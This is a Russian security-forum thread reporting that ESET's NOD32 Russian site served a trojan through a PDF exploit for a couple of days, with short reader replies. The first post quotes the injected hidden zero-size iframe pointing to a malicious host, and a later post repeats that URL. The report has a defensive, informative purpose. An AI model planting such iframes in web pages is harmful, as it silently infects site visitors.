Показано с 1 по 4 из 4.

Сайт антивируса NOD32 заражал посетителей троянами

  1. #1
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SDA
    Регистрация
    07.01.2005
    Адрес
    Москва
    Сообщений
    7,168
    Вес репутации
    3166

    Сайт антивируса NOD32 заражал посетителей троянами

    Главная страница сайта российского представительства антивирусной компании ESET какое-то время представляла опасность для посетителей. Судя по сообщению хабраюзера Dizel Generator, при посещении этой странички в браузере Opera, открылся некий PDF-файл, после чего произошла попытка запуска странного исполняемого файла.

    В случае с данным пользователем попытка заражения его компьютера не удалась, благо у него стояла защита в виде файервола. Однако, судя по всему, попытка эта основывалась на эксплуатации одной из уязвимостей PDF-файлов. В коде страницы при этом был обнаружен скрытый iframe, откуда на компьютеры пользователей внедрялся, а потом и запускался вредоносный код.

    Примечательно, что изначально, т.е. по крайней мере с 19 ноября, антивирусный продукт компании ESET, NOD32, эту заразу не распознавал. Судя по обсуждению данной проблемы на официальных форумах ESET, антивирус Касперского идентифицировал её как Trojan-Downloader.Java.Agent.ab (сигнатура добавлена в базу "Лаборатории Касперского" 18 ноября).

    В базы NOD32 новый троян был добавлен в течение суток после того, как Dizel Generator сообщил о своей находке в форуме. Однако сайт какое-то время после этого так и оставался зараженным. Сейчас вредоносный код с его страниц уже убран, сервис Unmask Parasites определяет этот ресурс как "чистый".
    http://www.webplanet.ru/news/securit...et_trojan.html
    скрытый фрейм висевший 2 дня:
    </body><iframe pcvsn='j6Av392D' src='хttp://newiframe.com/s/in.cgi?6' xvnil='BwpbaJm1' width='0' height='0' style='display:none'></iframe>
    </html
    http://www.virustotal.com/ru/analisi...fac-1258711260

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    26.08.2009
    Адрес
    Spb
    Сообщений
    463
    Вес репутации
    103
    Ну нифига себе прикол...раньше был уверен, что уж на сайты антивирусов можно заходить без опасения. Значит никому нельзя доверять. Все врут, как говорит хаус)

  4. #3
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для ALEX(XX)
    Регистрация
    31.03.2005
    Адрес
    Чернигов
    Сообщений
    10,777
    Вес репутации
    3709
    Цитата Сообщение от craftix Посмотреть сообщение
    Все врут, как говорит хаус
    И он таки прав
    Left home for a few days and look what happens...

  5. #4
    Full Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для paul-13
    Регистрация
    26.09.2008
    Сообщений
    157
    Вес репутации
    112
    хttp://newiframe.com/s/in.cgi?6
    Позавчера такой же iframe висел на _http://naviny.by/, уже убрали. Ладно белорусские новости, но сайт антивируса... Хорошая реклама для НОДа.
    t.A.T.u.

Похожие темы

  1. проблемы с удалением антивируса NOD32
    От albinossure в разделе Помогите!
    Ответов: 1
    Последнее сообщение: 25.08.2010, 13:49
  2. Ответов: 6
    Последнее сообщение: 22.02.2009, 10:04
  3. Зашел на сайт с 2 троянами и 1 червем
    От rusaltai в разделе Помогите!
    Ответов: 2
    Последнее сообщение: 22.02.2009, 02:22

Свернуть/Развернуть Ваши права в разделе

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
  •  
Page generated in 0.01338 seconds with 16 queries